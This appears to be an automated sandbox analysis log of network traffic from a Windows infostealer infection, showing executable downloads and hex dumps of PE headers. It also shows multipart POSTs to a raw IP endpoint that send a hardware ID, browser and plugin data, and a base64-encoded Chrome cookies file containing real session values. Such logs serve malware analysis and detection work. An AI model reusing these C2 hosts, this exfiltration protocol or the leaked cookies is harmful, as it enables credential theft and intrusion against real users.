00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 15:11:36 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 15:11:37 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 15:12:19 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /load/th.php?c=1000 HTTP/1.1Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /load/dl.php?id=425&c=1000 HTTP/1.1Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /load/dl.php?id=456 HTTP/1.1Host: d68kcn56pzfb4.cloudfront.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /385128/setup.exe HTTP/1.1Host: monoblocked.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /385128/setup.exe HTTP/1.1Host: c.574859385.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /google_ifi_ico.png?rnd=ao4JqF5ZqI8kKu4EL0Gn_LYPC4GYPC9IYPC8OYPC6GYPC8NXPC7NYPC7IYPC7NXPC0VYPC2NXPC3TVPC8 HTTP/1.1Host: service-domain.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /google_ifi_ico.png?rnd=Zd3zh3ZT3XmF8YI2eYS_RGXB9UGXB3SGXB6CHXB7UGXB6FIXB4FHXB1SGXB9FIXB9HGXB6FIXB9JJXB0 HTTP/1.1Host: service-domain.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1Connection: Keep-AliveCache-Control: no-cacheHost: clients2.googleusercontent.com
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1Connection: Keep-AliveCache-Control: no-cacheHost: clients2.googleusercontent.com
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnkif1inWhBJ6y1gDsDQZ4Eyn_Qz_uLRCpaeXDwuVacP9m-meDjm0tJh22MKIBX7Qu2os3lQfBH4jrbinMvfs-3zRTSg6nxPBNENq5Js864RKJG5AMZSmuX13L8KhHlzOdsbuBGxxZNB_X1K4A/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1Connection: Keep-AliveCache-Control: no-cacheHost: clients2.googleusercontent.com
Source: global traffic	HTTP traffic detected: GET /ISetup1.exe HTTP/1.1Host: 185.172.128.59Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAAKJKJEBGHJKFHIDGHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 42 34 30 36 36 43 39 35 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 2d 2d 0d 0a Data Ascii: ------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="hwid"7EB4066C95534228319403------BAAAAKJKJEBGHJKFHIDGContent-Disposition: form-data; name="build"default10------BAAAAKJKJEBGHJKFHIDG--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBAHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 2d 2d 0d 0a Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="message"browsers------HDAKJDHIEBFIIDGDGDBA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="message"plugins------KEBGHCBAEGDHIDGCBAEC--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAKHost: 185.172.128.76Content-Length: 7287Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGDHost: 185.172.128.76Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDBHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FIIDBKJJDGHDHJKEHJDBContent-Disposition: form-data; name="file"------FIIDBKJJDGHDHJKEHJDB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 